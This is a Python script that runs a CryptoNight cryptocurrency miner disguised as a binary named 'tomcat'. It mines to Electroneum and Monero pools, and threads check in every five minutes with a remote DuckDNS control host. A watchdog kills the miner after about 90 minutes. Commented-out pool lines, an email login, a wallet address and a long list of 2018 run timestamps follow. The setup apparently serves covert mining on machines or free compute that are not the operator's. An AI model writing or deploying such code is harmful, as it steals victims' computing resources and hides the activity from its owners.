import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:18:06.746649
#2018-02-17 16:06:06.377937
#2018-02-17 17:55:01.864476
#2018-02-17 19:42:07.915671
#2018-02-17 21:30:09.401444
#2018-02-17 23:16:04.023283
#2018-02-18 01:03:05.609841
#2018-02-18 02:51:04.780383
#2018-02-18 04:39:05.176465
#2018-02-18 06:29:07.222611
#2018-02-18 08:18:05.765423
#2018-02-18 10:06:07.774166
#2018-02-18 11:52:03.644550
#2018-02-18 13:37:01.892342
#2018-02-18 15:27:05.175868
#2018-02-18 17:16:05.895543
#2018-02-18 19:04:07.390690
#2018-02-18 20:51:06.061410
#2018-02-18 22:38:02.043951
#2018-02-19 00:27:05.902454
#2018-02-19 02:13:05.687007
#2018-02-19 04:01:04.351109
#2018-02-19 05:45:04.230021
#2018-02-19 07:33:07.430482
#2018-02-19 09:23:07.773746
#2018-02-19 11:12:06.019555
#2018-02-19 12:59:07.009366
#2018-02-19 14:46:07.689059
#2018-02-19 16:35:03.896909
#2018-02-19 18:23:08.128240
#2018-02-19 20:08:07.812665
#2018-02-19 21:59:03.301595
#2018-02-19 23:44:02.147095
#2018-02-20 01:31:07.726247
#2018-02-20 03:20:01.697232
#2018-02-20 05:07:01.894716
#2018-02-20 06:49:07.686222
#2018-02-20 08:35:06.880824
#2018-02-20 10:19:07.548431
#2018-02-20 12:04:08.462195
#2018-02-20 13:50:08.258797
#2018-02-20 15:34:09.373628
#2018-02-20 17:20:08.257539
#2018-02-20 19:09:02.204393
#2018-02-20 20:59:08.150337
#2018-02-20 22:44:08.118137
#2018-02-21 00:26:07.700095
#2018-02-21 02:12:08.405757
#2018-02-21 04:01:06.369744
#2018-02-21 05:48:06.122387
#2018-02-21 07:37:06.924925
#2018-02-21 09:22:01.727992
#2018-02-21 11:10:01.641412
#2018-02-21 12:59:04.176640
#2018-02-21 14:46:09.431778
#2018-02-21 16:34:01.324268
#2018-02-21 18:24:05.394147
#2018-02-21 20:08:08.038182
#2018-02-21 21:57:08.628786
#2018-02-21 23:45:06.879275
#2018-02-22 01:37:06.999828
#2018-02-22 03:26:07.239941
#2018-02-22 05:14:01.725682
#2018-02-22 06:57:06.870599
#2018-02-22 08:44:04.476040
#2018-02-22 10:34:01.410650
#2018-02-22 12:21:10.557803
#2018-02-22 14:06:01.695972
#2018-02-22 15:53:10.939811
#2018-02-22 17:40:10.652249
#2018-02-22 19:27:04.415199
#2018-02-22 21:19:06.499063
#2018-02-22 23:04:06.822535
#2018-02-23 00:52:01.892072
#2018-02-23 02:41:01.714085
#2018-02-23 04:31:05.361330
#2018-02-23 06:17:04.028235
#2018-02-23 08:05:03.843963
#2018-02-23 10:22:07.261979
#2018-02-23 12:17:05.145174
#2018-02-23 14:05:07.732347
#2018-02-23 15:55:09.765425
#2018-02-23 17:41:04.372395
#2018-02-23 19:28:04.310177
#2018-02-23 21:13:02.073119
#2018-02-23 22:58:06.704328
#2018-02-24 00:45:09.566994
#2018-02-24 02:39:07.583876
#2018-02-24 05:13:04.818744
#2018-02-24 07:01:06.300805
#2018-02-24 08:35:01.591269
#2018-02-24 10:09:06.106005
#2018-02-24 11:54:01.600674
#2018-02-24 13:20:04.081726
#2018-02-24 14:51:07.287051
#2018-02-24 16:24:07.529448
#2018-02-24 18:01:03.482667
#2018-02-24 19:28:05.258152
#2018-02-24 21:04:04.716369
#2018-02-25 01:08:06.854174
#2018-02-25 04:36:04.387682
#2018-02-25 08:00:07.735282